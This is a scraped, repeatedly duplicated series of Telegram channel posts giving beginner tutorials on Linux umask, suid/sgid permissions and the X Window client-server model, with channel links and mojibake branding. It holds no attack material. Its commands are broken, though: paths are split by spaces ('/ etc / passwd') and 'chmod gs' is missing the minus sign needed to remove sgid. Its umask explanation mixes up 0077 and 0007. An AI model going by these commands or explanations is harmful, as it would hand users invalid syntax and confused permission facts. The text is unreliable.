> Unlike the file's "normal" permissions, umask specifies which permissions should be turned off. Let's take a look at our "pattern to number" mapping table so that we can understand what the umask of 0077 means: pattern number rwx 7 rw- 6 rx 5 r-- 4 -wx 3 -w- 2 --x 1 --- 0 Use this table, the last three digits of 0007 are expanded to --rwxrwx. Now, remember that umask tells the system which permissions are disabled. By inference, we can see that all Group and Other permissions will be turned off, while the User permissions will remain unchanged.
γγ
π¦ γIntroducing suid and sgid
γγ
1) When you first log in, a new shell process is started. You already know it, but you may not know that this new shell process (usually bash) runs with your user ID. In this way, the bash program can access all your files and directories. In fact, as users, we rely entirely on other programs to perform operations on our behalf. Because the programs you start inherit your user ID, they cannot access any file system objects that you are not allowed to access.
γγ
> γFor example, normal users cannot directly modify the passwd file because the "write" flag has been turned off for every user except the "root user":
γγ
γγ$ ls -l / etc / passwd
γγ
γγ-rw-r--r-- 1 root wheel 1355 Nov 1 21:16 / etc / passwd
γγ
2) However, the average user does need to be able to modify / etc / passwd (at least indirectly) whenever they need to change their password. But if the user cannot modify the file, how exactly does this work? γγFortunately for
γγ
γγSuid
γγ
3) the Linux permissions model has two specialized bits called "suid" and "sgid". When the "suid" bit of an executable is set, it runs on behalf of the owner of the executable, not the person who started the program. Now, back to the / etc / passwd issue. If you look at the passwd executable, we can see that it belongs to the root user:
γγ
γγ$ ls -l / usr / bin / passwd
γγ
γγ-rwsr-xr-x 1 root wheel 17588 Sep 24 00:53 / usr / bin / passwd
γγ
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LINUX TUTORIAL PART 4:
T.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Linux systems, the default value of umask is generally 0022, which allows others to read your new files (if they can get them), It cannot be modified. To make new files more secure by default, you can change the umask setting: $ umask 0077umask will ensure that groups and other users have absolutely no permissions on the newly created files.
π¦ So how does umask work?
> Unlike the file's "normal" permissions, umask specifies which permissions should be turned off. Let's take a look at our "pattern to number" mapping table so that we can understand what the umask of 0077 means: pattern number rwx 7 rw- 6 rx 5 r-- 4 -wx 3 -w- 2 --x 1 --- 0 Use this table, the last three digits of 0007 are expanded to --rwxrwx. Now, remember that umask tells the system which permissions are disabled. By inference, we can see that all Group and Other permissions will be turned off, while the User permissions will remain unchanged.
γγ
π¦ γIntroducing suid and sgid
γγ
1) When you first log in, a new shell process is started. You already know it, but you may not know that this new shell process (usually bash) runs with your user ID. In this way, the bash program can access all your files and directories. In fact, as users, we rely entirely on other programs to perform operations on our behalf. Because the programs you start inherit your user ID, they cannot access any file system objects that you are not allowed to access.
γγ
> γFor example, normal users cannot directly modify the passwd file because the "write" flag has been turned off for every user except the "root user":
γγ
γγ$ ls -l / etc / passwd
γγ
γγ-rw-r--r-- 1 root wheel 1355 Nov 1 21:16 / etc / passwd
γγ
2) However, the average user does need to be able to modify / etc / passwd (at least indirectly) whenever they need to change their password. But if the user cannot modify the file, how exactly does this work? γγFortunately for
γγ
γγSuid
γγ
3) the Linux permissions model has two specialized bits called "suid" and "sgid". When the "suid" bit of an executable is set, it runs on behalf of the owner of the executable, not the person who started the program. Now, back to the / etc / passwd issue. If you look at the passwd executable, we can see that it belongs to the root user:
γγ
γγ$ ls -l / usr / bin / passwd
γγ
γγ-rwsr-xr-x 1 root wheel 17588 Sep 24 00:53 / usr / bin / passwd
γγ
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Linux Tutorial Final Part 5:
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
MORE ABOUT PERMISSION :@UNDERCODETESTING
1) you You will also notice that there is an s in place of an x ββin the user permission triples. 4
2) This shows that for this particular program, suid and executable bits are set. For this reason, when passwd runs, it will execute on behalf of the root user (with full superuser access), not on behalf of the user who runs it. Because passwd runs with root user access, the / etc / passwd file can be modified without any problems.
γγ
γγsuid / sgid caution note
γγ
3) We saw how suid works, and sgid works the same way. It allows the program to inherit the group ownership of the program instead of the current user's program ownership. Here is some other but important information about suid and sgid. First, suid and sgid occupy the same space as the x bits in the ls -l list. If the x bit is also set, the corresponding bit is represented as s (lowercase). However, if the x bit is not set, it is represented as S (uppercase). Another important note: suid and suid work well in many environments, but improper use of these bits can compromise system security. It is best to use as few "suid" programs as possible. The passwd command is one of the few commands that must use "suid".
γγ
γγChanging suid and sgid
γγ
γ4) settings and removing suid and sgid bits is fairly simple. Here we set the suid bit:
γγ
γγ# chmod u + s / usr / bin / myapp
γγ
γ5) Here we remove the sgid bit from a directory. We will see how the sgid bit affects the directories in the following screens:
γγ
γγ# chmod gs / home / drobbins
γγ
6) γγSo far we have looked at permissions from the perspective of regular files. The situation is a little different when looking at permissions from a directory perspective. Directories use the same permission flags, but they are interpreted to mean slightly different meanings. For a directory, if the "read" flag is set, you can list the contents of the directory; "write" means you can create files in the directory, and "execute" means you can enter the directory and access any subdirectories inside. Without the "execute" flag, file system objects within the directory are not accessible. Without the "read" flag, the file system objects in the directory are not viewable, but as long as someone knows the full path of the object on the disk, they can still access the objects in the directory. Directories and sgid If the "sgid" flag for a directory is enabled, any file system objects created within the directory will inherit the directory's group. This special feature is useful when you need to create a directory tree that is used by a group of people who belong to the same group. Just do this:
γγ
γγ# mkdir / home / groupspace
γγ
γγ# chgrp mygroup / home / groupspace
γγ
γγ# chmod g + s / home / groupspace
π¦Linux Tutorial Final Part 5:
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
MORE ABOUT PERMISSION :@UNDERCODETESTING
1) you You will also notice that there is an s in place of an x ββin the user permission triples. 4
2) This shows that for this particular program, suid and executable bits are set. For this reason, when passwd runs, it will execute on behalf of the root user (with full superuser access), not on behalf of the user who runs it. Because passwd runs with root user access, the / etc / passwd file can be modified without any problems.
γγ
γγsuid / sgid caution note
γγ
3) We saw how suid works, and sgid works the same way. It allows the program to inherit the group ownership of the program instead of the current user's program ownership. Here is some other but important information about suid and sgid. First, suid and sgid occupy the same space as the x bits in the ls -l list. If the x bit is also set, the corresponding bit is represented as s (lowercase). However, if the x bit is not set, it is represented as S (uppercase). Another important note: suid and suid work well in many environments, but improper use of these bits can compromise system security. It is best to use as few "suid" programs as possible. The passwd command is one of the few commands that must use "suid".
γγ
γγChanging suid and sgid
γγ
γ4) settings and removing suid and sgid bits is fairly simple. Here we set the suid bit:
γγ
γγ# chmod u + s / usr / bin / myapp
γγ
γ5) Here we remove the sgid bit from a directory. We will see how the sgid bit affects the directories in the following screens:
γγ
γγ# chmod gs / home / drobbins
γγ
6) γγSo far we have looked at permissions from the perspective of regular files. The situation is a little different when looking at permissions from a directory perspective. Directories use the same permission flags, but they are interpreted to mean slightly different meanings. For a directory, if the "read" flag is set, you can list the contents of the directory; "write" means you can create files in the directory, and "execute" means you can enter the directory and access any subdirectories inside. Without the "execute" flag, file system objects within the directory are not accessible. Without the "read" flag, the file system objects in the directory are not viewable, but as long as someone knows the full path of the object on the disk, they can still access the objects in the directory. Directories and sgid If the "sgid" flag for a directory is enabled, any file system objects created within the directory will inherit the directory's group. This special feature is useful when you need to create a directory tree that is used by a group of people who belong to the same group. Just do this:
γγ
γγ# mkdir / home / groupspace
γγ
γγ# chgrp mygroup / home / groupspace
γγ
γγ# chmod g + s / home / groupspace
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is Xwindows :
Xwindows from a programmer's perspective Full guide :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) X Window System is a window system of Client-Server architecture. It is a necessary graphical interface for modern Unix systems (including Linux, FreeBSD etc.).
2) undercode introduces several important features of the X Window System from the perspective of a programmer, so that readers have a clear X concept before starting to write X applications
2) What is X Window System ?
> Before 1984, many commercial companies began to develop graphical user interfaces (GUIs) for UNIX systems.
> Because the graphics interface specifications developed by each company were inconsistent, and most of the systems developed depended on the use of various companies. Computer systems (Mainframe, Mini Computer, WorkStation, etc.).
> As a result, not only can each graphics interface not communicate with each other, it is more difficult for applications to be executed on multiple systems.
> At the same time, due to different interface specifications, program writing The method will also be different depending on the platform, and programmers are also a lot of trouble.
> It is easy for a user to be familiar with a graphical interface system such as Microsoft Windows or Apple Macintosh, but for programmers, the methods and styles of writing Windows programs and writing Machintosh programs are completely different (because the program sets the interface Inconsistent);
> Furthermore, these window systems are limited to hardware environment and operating system manufacturers. Programs that can be run on the Crosoft Windows platform can neither be executed on the Macintosh nor limited to use in the PC environment. Refers to the program containing the graphical interface program code).
> For this reason, the Massachusetts Institute of Technology (MIT) began the X Window System development plan for the Client-Server architecture.
> The goal of X Window development is to "provide a hardware-independent, unified, and network transparent (Network Transparent) graphical interface environment" so that various operating systems and computer hardware can execute X Window (hardware-independent) programs. The design method is consistent (uniform), and can share X resources on other computers through the network.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is Xwindows :
Xwindows from a programmer's perspective Full guide :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) X Window System is a window system of Client-Server architecture. It is a necessary graphical interface for modern Unix systems (including Linux, FreeBSD etc.).
2) undercode introduces several important features of the X Window System from the perspective of a programmer, so that readers have a clear X concept before starting to write X applications
2) What is X Window System ?
> Before 1984, many commercial companies began to develop graphical user interfaces (GUIs) for UNIX systems.
> Because the graphics interface specifications developed by each company were inconsistent, and most of the systems developed depended on the use of various companies. Computer systems (Mainframe, Mini Computer, WorkStation, etc.).
> As a result, not only can each graphics interface not communicate with each other, it is more difficult for applications to be executed on multiple systems.
> At the same time, due to different interface specifications, program writing The method will also be different depending on the platform, and programmers are also a lot of trouble.
> It is easy for a user to be familiar with a graphical interface system such as Microsoft Windows or Apple Macintosh, but for programmers, the methods and styles of writing Windows programs and writing Machintosh programs are completely different (because the program sets the interface Inconsistent);
> Furthermore, these window systems are limited to hardware environment and operating system manufacturers. Programs that can be run on the Crosoft Windows platform can neither be executed on the Macintosh nor limited to use in the PC environment. Refers to the program containing the graphical interface program code).
> For this reason, the Massachusetts Institute of Technology (MIT) began the X Window System development plan for the Client-Server architecture.
> The goal of X Window development is to "provide a hardware-independent, unified, and network transparent (Network Transparent) graphical interface environment" so that various operating systems and computer hardware can execute X Window (hardware-independent) programs. The design method is consistent (uniform), and can share X resources on other computers through the network.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ X Server and Client X : (Client-Server Architecture)
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) X-a is the Window the System Configuration] [Client-Server graphical interface system. X Client refers to a variety of applications (word processing, database applications, network software, etc.),
2) while X Server is mainly processing requests from X Client applications and drawing graphics on the screen (so called Display Server ); And is responsible for managing available system resources such as glyphs and screen colors, reading user input (from the keyboard or mouse), and transmitting keyboard, mouse events, and window status information to the X Client (that is, the application).
π¦ X Server and Client X : (Client-Server Architecture)
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) X-a is the Window the System Configuration] [Client-Server graphical interface system. X Client refers to a variety of applications (word processing, database applications, network software, etc.),
2) while X Server is mainly processing requests from X Client applications and drawing graphics on the screen (so called Display Server ); And is responsible for managing available system resources such as glyphs and screen colors, reading user input (from the keyboard or mouse), and transmitting keyboard, mouse events, and window status information to the X Client (that is, the application).
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ X Protocol :(classed under Client-Server Architecture)
t.me/iOsDeveloppers
π¦ ππΌππ πππΈβπ :
1) In the X Window System, X Server and X Client both use X Protocol to exchange messages.
2) X Protocol defines the message exchange format between X Server and X Client.
3) Regarding the X Protocol, readers will gradually appreciate its existence after contacting more X Programming information. At present, it may be useful to temporarily consider the role of the X Protocol in the X Window System, and imagine the HTTP protocol in the Web Server and Web Client. (Browser) plays the same communication role.
4) A special point in the X Window System is that the X Protocol allows X Server and X Client to exchange messages across the network. This means that X Server and X Client need not be restricted to run on the same machine and can be run on different computers. On the same time.
5) X Server and X Client execute on the same computer
>If you only want to activate the X Server and not run other X Clients, you can just enter the X command to execute it. After the execution, you usually only see a desktop with a gray background (also called RootWindow).
6) For programmers who write X Client, X Client and X Server are executed on different computers, and it does not affect the method of writing programs. Because the X Client obtains the location of the X Server from the environment variable DISPLAY, it is decided during the execution period to which X Server the execution result should be passed. These are because of the use of X Protocol. X Protocol makes the actual location of X Server and X Client (perhaps on the local machine or the network) transparent (the programmer cannot see or need to know) We call this feature "Network Transparent".
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ X Protocol :(classed under Client-Server Architecture)
t.me/iOsDeveloppers
π¦ ππΌππ πππΈβπ :
1) In the X Window System, X Server and X Client both use X Protocol to exchange messages.
2) X Protocol defines the message exchange format between X Server and X Client.
3) Regarding the X Protocol, readers will gradually appreciate its existence after contacting more X Programming information. At present, it may be useful to temporarily consider the role of the X Protocol in the X Window System, and imagine the HTTP protocol in the Web Server and Web Client. (Browser) plays the same communication role.
4) A special point in the X Window System is that the X Protocol allows X Server and X Client to exchange messages across the network. This means that X Server and X Client need not be restricted to run on the same machine and can be run on different computers. On the same time.
5) X Server and X Client execute on the same computer
>If you only want to activate the X Server and not run other X Clients, you can just enter the X command to execute it. After the execution, you usually only see a desktop with a gray background (also called RootWindow).
6) For programmers who write X Client, X Client and X Server are executed on different computers, and it does not affect the method of writing programs. Because the X Client obtains the location of the X Server from the environment variable DISPLAY, it is decided during the execution period to which X Server the execution result should be passed. These are because of the use of X Protocol. X Protocol makes the actual location of X Server and X Client (perhaps on the local machine or the network) transparent (the programmer cannot see or need to know) We call this feature "Network Transparent".
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Telegram
iUNDERCODE IOS JAILBREAK SUPPORT & HELP
WELCOME TO iUNDERCODE BY UNDERCODE TESTING FOR IOS JAILBREAK & TWEAKS GROUP RULES @UNDERCODERULES
ππΎππππ±π ΄
Youtube.com/c/Undercode
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTesting
@iUNDERCODE
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestinG
@iUNDERCODE
πππ Έπππ ΄π
@iUNDERCODE
@UNDERCODENEWS
ππΎππππ±π ΄
Youtube.com/c/Undercode
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTesting
@iUNDERCODE
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestinG
@iUNDERCODE
πππ Έπππ ΄π
@iUNDERCODE
@UNDERCODENEWS